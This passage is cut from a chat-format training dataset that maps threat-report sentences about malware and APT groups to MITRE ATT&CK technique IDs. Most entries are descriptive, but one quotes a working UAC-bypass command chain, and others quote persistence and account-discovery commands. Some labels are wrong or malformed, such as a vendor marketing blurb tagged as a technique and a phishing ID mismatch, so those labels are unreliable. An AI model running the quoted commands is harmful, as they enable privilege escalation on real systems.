Open a decoy document (described later) Close the Terminal window that just opened The decoy document replaces the downloader Mach-O file, which means the malicious executable is only present in the ZIP file now" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT has made registry modifications to alter its behavior upon execution." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used Web shells to maintain access to victim websites." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has used malware to collect information on files and directories." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GravityRAT creates a scheduled task to ensure it is re-executed everyday." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum can establish persistence by creating a .lnk shortcut to itself in the Startup folder." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In a recent wave of attacks during February 2019, Elfin attempted to exploit a known vulnerability (CVE-2018-20250) in WinRAR, the widely used file archiving and compression utility capable of creating self-extracting archive files. The exploit was used against one target in the chemical sector in Saudi Arabia. If successfully exploited on an unpatched computer, the vulnerability could permit an attacker to install any file on the computer, which effectively permits code execution on the targeted computer" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kobalos decrypts strings right after the initial communication, but before the authentication process." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Appending a file signature header to all encrypted data, prior to upload or download, by randomly selecting from the file types" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses commands such as netsh interface show to discover network interface settings." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cuba has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this blog, we described how Redaman has become more effective by hiding dynamic C&C server addresses inside the Bitcoin blockchain" }, { "role": "assistant", "content": "T1102.001 - Dead Drop Resolver" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of spreading to USB devices." }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell can transfer files from a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Smart, optimized, and connected, XGen security powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathers user names from infected hosts." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ChChes collects the victim hostname, window resolution, and Microsoft Windows version." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A version of introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has used a Perl reverse shell to communicate with C2." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 5: Sample pseudo-HTTP beacon The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additionally it checks to determine if common analysis tools are currently running on the infected system" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UPPERCUT has the capability to collect the current logged on user’s username from a machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DEATHRANSOM, HELLOKITTY, and FIVEHANDS use the same code to delete volume shadow copies via WMI by performing the query select * from Win32_ShadowCopy and then deleting each instance returned by its id" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation', 'T1490 - Inhibit System Recovery', 'T1490 - Inhibit System Recovery', 'T1490 - Inhibit System Recovery', 'T1047 - Windows Management Instrumentation', 'T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has attempted to get users to click on Office attachments with malicious macros embedded." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the PuTTY sample discovered on VirusTotal, the malicious code was inserted into the ssh2_userauth_process_queue function (source file: putty-0.77\\ssh\\userauth2-client.c). The code resides in the part of the function responsible for performing password authentication, as opposed to other methods such as keyboard-interactive authentication or public key. Once the user establishes a connection and enters their username and password, the malicious code is executed regardless of the authentication result." }, { "role": "assistant", "content": "T1480 - Execution Guardrails" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hildegard has started a monero service." }, { "role": "assistant", "content": "T1543.002 - Create or Modify System Process: SysV/Systemd Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality. Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more. However, our current analysis shows no way for such code to be executed" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT can create, delete, or modify a specified Registry key or value." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CoinTicker decodes the initially-downloaded hidden encoded file using OpenSSL." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RCSession can gather system owner information, including user and administrator privileges." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One version of consists of VBScript and PowerShell scripts. The malware also uses batch scripting." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has compressed data into .zip files prior to exfiltration." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has used JavaScript to drop and execute malware loaders." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has removed files from victim machines." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After downloading its main config file, downloads multiple payloads from C2 servers." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldFinder logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HotCroissant has the ability to identify the IP address of the compromised machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RCSession can use HTTP in C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cadelspy has the ability to identify open windows on the compromised host." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "gathered information and files from local directories for exfiltration." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "There are multiple ways for the operators to reach a Kobalos-infected machine. The method we’ve seen the most is where Kobalos is embedded in the OpenSSH server executable (sshd) and will trigger the backdoor code if the connection is coming from a specific TCP source port. These variants either connect to a C&C server that will act as a middleman, or wait for an inbound connection on a given TCP port" }, { "role": "assistant", "content": "T1205 - Traffic Signaling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aquatic Panda has used native OS commands to understand privilege levels and system details." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The main C2 loop starts after the initial upload of the reconnaissance data, iterating once every approximately 30 seconds. For the first five minutes, each iteration will capture a screenshot of the display and upload it to the \"normal\" subdirectory with an encoded timestamp as the filename. After the first five minutes, the screenshot uploads once every five minutes" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KGH_SPY has masqueraded as a legitimate Windows tool." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AADInternals can dump secrets from the Local Security Authority." }, { "role": "assistant", "content": "T1003.004 - OS Credential Dumping: LSA Secrets" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attack involved a spear-phishing email with a subject of “Project Offer” and a malicious Word document (SHA256: d393349a4ad00902e3d415b622cf27987a0170a786ca3a1f991a521bff645318) as an attachment" }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Industroyer’s data wiper module clears registry keys and overwrites both ICS configuration and Windows files." }, { "role": "assistant", "content": "T1485 - Data Destruction" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FatDuke can identify the MAC address on the target computer." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SDBbot has the ability to communicate with C2 with TCP over port 443." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encodes files before exfiltration." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT30 has used spearphishing emails with malicious DOC attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can identify remote systems through the \"net view\" command." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their malware." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Komplex trojan creates a persistent launch agent called with \"$HOME/Library/LaunchAgents/com.apple.updates.plist\" with \"launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist\"." }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Thrip leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "VERMIN can delete files on the victim’s machine." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool (RAT). The timestamps for these modules are from December 2017 until January 2018. The anti-detection launcher and decompressor make extensive use of Metasploit’s shikata_ga_nai encoder as well as LZNT1 compression" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StrongPity can automatically exfiltrate collected documents to the C2 server." }, { "role": "assistant", "content": "T1020 - Automated Exfiltration" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mosquito can upload and download files to the victim." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole has used ListPlanting to inject code into a trusted process." }, { "role": "assistant", "content": "T1055.015 - Process Injection: ListPlanting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca used VBA scripts." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OutSteel can delete itself following the successful execution of a follow-on payload." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Elise performs timestomping of a CAB file it creates." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang performs account discovery using commands such as \"net localgroup administrators\" and \"net group \"REDACTED\" /domain\" on specific permissions groups." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The macro then extracts the CAB file into %systemroo%\\system32, using either wusa.exe or expand.exe (depending on the OS) to again bypass UAC prompts Once the files have been extracted, the Visual Basic macro deletes the CAB file and runs the malicious NTWDBLIB.dll via cliconfg.exe (to gain privileges and bypass UAC protections) Command lines used by the Visual Basic macro: cmd /c wusa %TEMP%\\setup.cab /quiet /extract:%SystemRoot%\\System32 && del /f /q %TEMP%\\setup.cab && cliconfg.exe cmd /c expand %TEMP%\\setup.cab -F:* %SystemRoot%\\System32 && del /f /q %TEMP%\\setup.cab && cliconfg.exe A combination of NTWDBLIB.dll and cliconfg.exe are used to bypass UAC protections; this is a familiar attack on Windows" }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WellMail can use hard coded client and certificate authority certificates to communicate with C2 over mutual TLS." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 used VPNs and Outlook Web Access (OWA) to maintain access to victim networks." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HyperBro has used HTTPS for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bandook can upload files from a victim's machine over the C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER downloader code has included \"0\" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke has distributed cryptomining malware." }, { "role": "assistant", "content": "T1496 - Resource Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson can add Registry run keys for persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Neoichor can collect the user name from a victim's machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration." }, { "role": "assistant", "content": "T1560.002 - Archive Collected Data: Archive via Library" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has leveraged multiple types of spearphishing in order to attempt to get a user to open links and attachments." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Microsoft discovered these new attacker tools and capabilities in some compromised customer networks and observed them to be in use from August to September 2020. Further analysis has revealed these may have been on compromised systems as early as June 2020" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is a rootkit used by ." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be used to enumerate security software currently running on a system by process name of known products." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ryuk has used \"cmd.exe\" to create a Registry entry to establish persistence." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CreepySnail can use HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection." }, { "role": "assistant", "content": "T1036.003 - Masquerading: Rename System Utilities" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HAWKBALL has encrypted the payload with an XOR-based algorithm." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This agent also built in a function aptly named “DeleteLeftovers,” to remove certain artifacts of the attack" }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses steganography to hide backdoors in PNG files, which are also encrypted using the Tiny Encryption Algorithm (TEA)." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "establishes persistence by creating a shortcut." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE 